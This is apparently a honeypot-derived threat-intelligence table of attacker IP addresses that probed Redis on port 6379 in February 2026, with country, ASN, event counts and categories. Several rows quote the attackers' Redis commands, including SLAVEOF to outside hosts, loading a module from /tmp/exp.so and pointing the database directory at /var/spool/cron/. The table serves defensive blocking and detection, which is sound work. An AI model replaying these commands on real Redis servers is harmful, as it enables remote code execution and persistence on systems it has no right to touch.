| IPv4 | 13.219.1.233 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=14618; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | scanning_host | 2026-02-16 | |
| IPv4 | 54.169.183.58 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=SG; asn=16509; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-16 | |
| IPv4 | 192.81.218.98 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-02-16 | |
| IPv4 | 141.98.11.134 | Attacker IP • Redis / seen in Redishoneypot; events=7; ports=6379; cc=LT; asn=209605; asn_org=UAB Host Baltic; redis_cmd_hits=0 | bruteforce | 2026-02-16 | |
| IPv4 | 199.45.154.144 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398722; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-16 | |
| IPv4 | 199.45.154.186 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=398722; asn_org=Censys, Inc.; redis_cmd_hits=0 | scanning_host | 2026-02-16 | |
| IPv4 | 91.107.167.120 | Attacker IP • Redis / seen in Redishoneypot; events=1; ports=6379; cc=DE; asn=24940; asn_org=Hetzner Online GmbH; redis_cmd_hits=0 | scanning_host | 2026-02-16 | |
| IPv4 | 92.63.197.182 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=UA; asn=211736; asn_org=FOP Dmytro Nedilskyi; redis_cmd_hits=0 | scanning_host | 2026-02-16 | |
| IPv4 | 168.119.163.82 | Attacker IP • Redis / seen in Redishoneypot; events=16; ports=6379; cc=DE; asn=24940; asn_org=Hetzner Online GmbH; redis_cmd_hits=0 | bruteforce | 2026-02-16 | |
| IPv4 | 20.84.117.55 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-16 | |
| IPv4 | 159.223.152.113 | Attacker IP • Redis / seen in Redishoneypot; events=20; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-02-17 | |
| IPv4 | 198.235.24.111 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-02-17 | |
| IPv4 | 88.210.63.69 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=UA; asn=211736; asn_org=FOP Dmytro Nedilskyi; redis_cmd_hits=0 | scanning_host | 2026-02-17 | |
| IPv4 | 157.90.236.134 | Attacker IP • Redis / seen in Redishoneypot; events=17; ports=6379; cc=DE; asn=24940; asn_org=Hetzner Online GmbH; cats=Misc activity; redis_cmds=AUTH process.env.DB_PASS,; redis_cmd_hits=0; cmd="AUTH process.env.DB_PASS," | bruteforce | 2026-02-17 | |
| IPv4 | 162.243.162.70 | Attacker IP • Redis / seen in Redishoneypot; events=21; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-02-17 | |
| IPv4 | 206.189.227.153 | Attacker IP • Redis / seen in Redishoneypot; events=17; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-02-17 | |
| IPv4 | 3.151.241.153 | Attacker IP • Redis / seen in Redishoneypot; events=100; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; cats=Generic Protocol Command Decode,Misc activity; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0; cmd="...L..W'.i...........Y....curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group" | bruteforce | 2026-02-17 | |
| IPv4 | 45.142.193.169 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=RO; asn=214295; asn_org=Skynet Network Ltd; redis_cmd_hits=0 | scanning_host | 2026-02-17 | |
| IPv4 | 64.62.197.227 | Attacker IP • Redis / seen in Redishoneypot; events=26; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | bruteforce | 2026-02-17 | |
| IPv4 | 64.62.197.235 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | scanning_host | 2026-02-17 | |
| IPv4 | 20.169.50.188 | Attacker IP • Redis / seen in Redishoneypot; events=23; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-17 | |
| IPv4 | 8.130.87.18 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-17 | |
| IPv4 | 45.227.254.6 | Attacker IP • Redis / seen in Redishoneypot; events=8; ports=6379; cc=PA; asn=267784; asn_org=Flyservers S.A.; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-02-17 | |
| IPv4 | 172.202.50.78 | Attacker IP • Redis / seen in Redishoneypot; events=17; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-17 | |
| IPv4 | 85.11.182.23 | Attacker IP • Redis / seen in Redishoneypot; events=27; ports=6379; cc=GB; asn=212027; asn_org=PebbleHost Ltd; cats=Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0 | bruteforce | 2026-02-17 | |
| IPv4 | 162.142.125.222 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-17 | |
| IPv4 | 167.94.138.181 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-17 | |
| IPv4 | 193.163.125.10 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=GB; asn=211298; asn_org=Driftnet Ltd; redis_cmd_hits=0 | scanning_host | 2026-02-17 | |
| IPv4 | 109.105.209.22 | Attacker IP • Redis / seen in Redishoneypot; events=14; ports=6379; cc=PT; asn=21859; asn_org=Zenlayer Inc; redis_cmd_hits=0 | bruteforce | 2026-02-18 | |
| IPv4 | 138.197.110.172 | Attacker IP • Redis / seen in Redishoneypot; events=7; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Generic Protocol Command Decode,Misc activity,Not Suspicious Traffic; redis_cmd_hits=0 | bruteforce | 2026-02-18 | |
| IPv4 | 205.210.31.66 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-02-18 | |
| IPv4 | 36.139.84.140 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=56046; asn_org=China Mobile communications corporation; redis_cmd_hits=0 | bruteforce | 2026-02-18 | |
| IPv4 | 143.110.150.233 | Attacker IP • Redis / seen in Redishoneypot; events=19; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0 | bruteforce | 2026-02-18 | |
| IPv4 | 47.94.94.116 | Attacker IP • Redis / seen in Redishoneypot; events=39; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmds=MODULE LOAD /tmp/exp.so,CONFIG SET dbfilename exp.so,MODULE UNLOAD system,config set dir /var/spool/cron/,config set rdbcompression no; redis_cmd_hits=0; cmd="SLAVEOF NO ONE" | command_and_control | 2026-02-18 | |
| IPv4 | 120.78.5.126 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | bruteforce | 2026-02-18 | |
| IPv4 | 199.45.154.184 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=398722; asn_org=Censys, Inc.; redis_cmd_hits=0 | scanning_host | 2026-02-18 | |
| IPv4 | 199.45.155.107 | Attacker IP • Redis / seen in Redishoneypot; events=11; ports=6379; cc=US; asn=398722; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-18 | |
| IPv4 | 85.11.182.27 | Attacker IP • Redis / seen in Redishoneypot; events=28; ports=6379; cc=GB; asn=201002; asn_org=PebbleHost Ltd; cats=Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0 | bruteforce | 2026-02-18 | |
| IPv4 | 8.136.230.142 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-02-18 | |
| IPv4 | 85.11.183.25 | Attacker IP • Redis / seen in Redishoneypot; events=27; ports=6379; cc=GB; asn=201002; asn_org=PebbleHost Ltd; cats=Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0 | bruteforce | 2026-02-18 | |
| IPv4 | 65.49.1.230 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | scanning_host | 2026-02-18 | |
| IPv4 | 45.142.193.30 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=RO; asn=214295; asn_org=Skynet Network Ltd; redis_cmd_hits=0 | scanning_host | 2026-02-18 | |
| IPv4 | 20.106.186.90 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-18 | |
| IPv4 | 39.105.136.140 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-18 | |
| IPv4 | 71.6.232.27 | Attacker IP • Redis / seen in Redishoneypot; events=18; ports=6379; cc=US; asn=10439; asn_org=CariNet, Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-18 | |
| IPv4 | 101.201.124.141 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-18 | |
| IPv4 | 205.210.31.198 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-02-18 | |
| IPv4 | 193.3.53.11 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=211607; asn_org=Securitytrails, LLC; redis_cmd_hits=0 | scanning_host | 2026-02-18 | |
| IPv4 | 167.94.138.118 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-19 | |
| IPv4 | 167.94.138.128 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | scanning_host | 2026-02-19 | |
| IPv4 | 64.225.44.164 | Attacker IP • Redis / seen in Redishoneypot; events=18; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0 | bruteforce | 2026-02-19 | |
| IPv4 | 18.119.209.50 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | scanning_host | 2026-02-19 | |
| IPv4 | 204.216.147.144 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=BR; asn=31898; asn_org=Oracle Corporation; cats=Generic Protocol Command Decode,Web Application Attack,Attempted Administrator Privilege Gain,Misc activity; redis_cmd_hits=0 | malware_hosting | 2026-02-19 | |
| IPv4 | 217.154.17.122 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=FR; asn=8560; asn_org=IONOS SE; redis_cmd_hits=0 | scanning_host | 2026-02-19 | |
| IPv4 | 113.105.90.148 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-02-19 | |
| IPv4 | 77.90.185.215 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=DE; asn=215476; asn_org=Inside Network LTD; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-02-19 | |
| IPv4 | 16.58.56.214 | Attacker IP • Redis / seen in Redishoneypot; events=99; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; cats=Generic Protocol Command Decode,Misc activity; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0; cmd="SSH-2.0-Go " | bruteforce | 2026-02-19 | |
| IPv4 | 45.156.128.169 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=PT; asn=211680; asn_org=Sistemas Informaticos, S.A.; redis_cmd_hits=0 | bruteforce | 2026-02-19 | |
| IPv4 | 45.156.128.170 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=PT; asn=211680; asn_org=Sistemas Informaticos, S.A.; redis_cmd_hits=0 | scanning_host | 2026-02-19 | |
| IPv4 | 45.156.128.171 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=PT; asn=211680; asn_org=Sistemas Informaticos, S.A.; redis_cmds=EVAL 0; redis_cmd_hits=0; cmd="EVAL 0" | malware_hosting | 2026-02-19 | |
| IPv4 | 1.83.125.87 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; redis_cmd_hits=0 | scanning_host | 2026-02-19 | |
| IPv4 | 1.85.217.244 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; redis_cmd_hits=0 | scanning_host | 2026-02-19 | |
| IPv4 | 123.245.85.75 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; redis_cmd_hits=0 | bruteforce | 2026-02-19 | |
| IPv4 | 143.42.1.52 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0 | scanning_host | 2026-02-19 | |
| IPv4 | 182.138.158.51 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-02-19 | |
| IPv4 | 59.173.110.206 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; redis_cmd_hits=0 | scanning_host | 2026-02-19 | |
| IPv4 | 59.52.100.22 | Attacker IP • Redis / seen in Redishoneypot; events=13; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; cats=Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0 | bruteforce | 2026-02-19 | |
| IPv4 | 185.55.240.152 | Attacker IP • Redis / seen in Redishoneypot; events=8; ports=6379; cc=DE; asn=199912; asn_org=Layer7 Networks GmbH; cats=Generic Protocol Command Decode,Web Application Attack,Attempted Administrator Privilege Gain,Misc activity; redis_cmd_hits=0 | malware_hosting | 2026-02-19 | |
| IPv4 | 200.171.87.44 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=BR; asn=27699; asn_org=TELEFONICA BRASIL S.A; redis_cmd_hits=0 | scanning_host | 2026-02-19 | |
| IPv4 | 65.49.1.38 | Attacker IP • Redis / seen in Redishoneypot; events=27; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | bruteforce | 2026-02-19 | |
| IPv4 | 65.49.1.51 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | scanning_host | 2026-02-19 | |
| IPv4 | 71.6.134.232 | Attacker IP • Redis / seen in Redishoneypot; events=18; ports=6379; cc=US; asn=10439; asn_org=CariNet, Inc.; cats=Misc activity; redis_cmd_hits=0 | bruteforce | 2026-02-19 | |
| IPv4 | 180.95.238.167 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; redis_cmd_hits=0 | scanning_host | 2026-02-19 | |
| IPv4 | 27.47.25.94 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=CN; asn=17622; asn_org=China Unicom Guangzhou network; redis_cmd_hits=0 | bruteforce | 2026-02-19 | |
| IPv4 | 167.248.133.112 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | scanning_host | 2026-02-19 | |
| IPv4 | 8.154.38.125 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | bruteforce | 2026-02-19 | |
| IPv4 | 65.49.1.69 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | scanning_host | 2026-02-20 | |
| IPv4 | 206.168.34.218 | Attacker IP • Redis / seen in Redishoneypot; events=13; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-20 | |
| IPv4 | 111.231.1.253 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=45090; asn_org=Shenzhen Tencent Computer Systems Company Limited; redis_cmd_hits=0 | scanning_host | 2026-02-20 | |
| IPv4 | 198.235.24.224 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-02-20 | |
| IPv4 | 80.82.77.139 | Attacker IP • Redis / seen in Redishoneypot; events=17; ports=6379; cc=NL; asn=202425; asn_org=IP Volume inc; redis_cmd_hits=0 | bruteforce | 2026-02-20 | |
| IPv4 | 39.108.100.57 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-20 | |
| IPv4 | 159.203.177.135 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-02-20 | |
| IPv4 | 164.92.86.252 | Attacker IP • Redis / seen in Redishoneypot; events=20; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0 | bruteforce | 2026-02-20 | |
| IPv4 | 48.217.187.105 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-20 | |
| IPv4 | 3.130.168.2 | Attacker IP • Redis / seen in Redishoneypot; events=98; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; cats=Generic Protocol Command Decode,Misc activity; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0; cmd="SSH-2.0-Go " | bruteforce | 2026-02-20 | |
| IPv4 | 143.42.1.84 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0 | scanning_host | 2026-02-20 | |
| IPv4 | 172.238.160.104 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0 | scanning_host | 2026-02-20 | |
| IPv4 | 14.103.78.216 | Attacker IP • Redis / seen in Redishoneypot; events=818; ports=6379; cc=CN; asn=4811; asn_org=China Telecom Group; cats=Generic Protocol Command Decode,Misc activity; redis_cmds=config set rdbcompression yes,SLAVEOF 8.219.221.124 60105,SLAVEOF 47.237.133.220 60107,MODULE LOAD /tmp/exp.so,SLAVEOF 47.236.26.200 60142; redis_cmd_hits=0; cmd="SLAVEOF NO ONE" | command_and_control | 2026-02-20 | |
| IPv4 | 159.223.141.131 | Attacker IP • Redis / seen in Redishoneypot; events=17; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-02-20 | |
| IPv4 | 192.241.134.238 | Attacker IP • Redis / seen in Redishoneypot; events=22; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-02-20 | |
| IPv4 | 195.184.76.112 | Attacker IP • Redis / seen in Redishoneypot; events=14; ports=6379; cc=US; asn=213412; asn_org=ONYPHE SAS; cats=Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0 | bruteforce | 2026-02-20 | |
| IPv4 | 195.184.76.114 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=213412; asn_org=ONYPHE SAS; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-02-20 | |
| IPv4 | 162.142.125.207 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-20 | |
| IPv4 | 18.219.56.153 | Attacker IP • Redis / seen in Redishoneypot; events=8; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-20 | |
| IPv4 | 193.163.125.3 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=GB; asn=211298; asn_org=Driftnet Ltd; redis_cmd_hits=0 | scanning_host | 2026-02-20 | |
| IPv4 | 137.184.10.69 | Attacker IP • Redis / seen in Redishoneypot; events=8; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-02-21 | |
| IPv4 | 34.228.104.231 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14618; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | scanning_host | 2026-02-21 | |
| IPv4 | 120.132.84.17 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4808; asn_org=China Unicom Beijing Province Network; redis_cmd_hits=0 | scanning_host | 2026-02-21 | |
| IPv4 | 205.210.31.93 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-02-21 | |
| IPv4 | 146.19.125.19 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=TR; asn=202412; asn_org=Omegatech LTD; redis_cmd_hits=0 | scanning_host | 2026-02-21 | |
| IPv4 | 198.1.195.234 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CA; asn=210554; asn_org=Meteor Cloud LTDA; redis_cmd_hits=0 | scanning_host | 2026-02-21 | |
| IPv4 | 20.65.194.42 | Attacker IP • Redis / seen in Redishoneypot; events=23; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-21 | |
| IPv4 | 34.141.214.34 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=NL; asn=396982; asn_org=Google LLC; redis_cmd_hits=0 | scanning_host | 2026-02-21 | |
| IPv4 | 143.42.1.185 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0 | scanning_host | 2026-02-21 | |
| IPv4 | 64.62.197.102 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | scanning_host | 2026-02-21 | |
| IPv4 | 64.62.197.92 | Attacker IP • Redis / seen in Redishoneypot; events=26; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | bruteforce | 2026-02-21 | |
| IPv4 | 20.64.105.152 | Attacker IP • Redis / seen in Redishoneypot; events=23; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-21 | |
| IPv4 | 165.22.61.50 | Attacker IP • Redis / seen in Redishoneypot; events=8; ports=6379; cc=SG; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-02-21 | |
| IPv4 | 167.94.138.168 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-21 | |
| IPv4 | 130.107.177.247 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=CA; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-22 | |
| IPv4 | 156.146.57.178 | Attacker IP • Redis / seen in Redishoneypot; events=506; ports=6379; cc=SG; asn=212238; asn_org=Datacamp Limited; cats=Generic Protocol Command Decode; redis_cmd_hits=0; cmd="...........\A.$$.. .=....o%rj..q.Q....Mw..! e ....:./.u.g...s8M..T.d.)..*..a...+./.,.0......... ...........A............................. ... c.......... ......" | bruteforce | 2026-02-22 | |
| IPv4 | 198.235.24.173 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-02-22 | |
| IPv4 | 20.163.15.123 | Attacker IP • Redis / seen in Redishoneypot; events=16; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-22 | |
| IPv4 | 178.128.66.109 | Attacker IP • Redis / seen in Redishoneypot; events=21; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0 | bruteforce | 2026-02-22 | |
| IPv4 | 62.210.137.200 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=FR; asn=12876; asn_org=Scaleway S.a.s.; redis_cmd_hits=0 | bruteforce | 2026-02-22 | |
| IPv4 | 3.134.216.108 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; cats=Misc activity; redis_cmd_hits=0 | scanning_host | 2026-02-22 | |
| IPv4 | 20.52.250.139 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=DE; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | scanning_host | 2026-02-22 | |
| IPv4 | 64.62.156.10 | Attacker IP • Redis / seen in Redishoneypot; events=26; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | bruteforce | 2026-02-22 | |
| IPv4 | 64.62.156.21 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | scanning_host | 2026-02-22 | |
| IPv4 | 134.209.64.116 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-02-22 | |
| IPv4 | 143.42.173.60 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0 | scanning_host | 2026-02-22 | |
| IPv4 | 142.93.209.215 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=IN; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-02-22 | |
| IPv4 | 40.76.124.166 | Attacker IP • Redis / seen in Redishoneypot; events=23; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-22 | |
| IPv4 | 100.28.191.174 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=14618; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | scanning_host | 2026-02-22 | |
| IPv4 | 167.94.138.190 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-22 | |
| IPv4 | 185.242.226.6 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=202425; asn_org=IP Volume inc; redis_cmd_hits=0 | scanning_host | 2026-02-22 | |
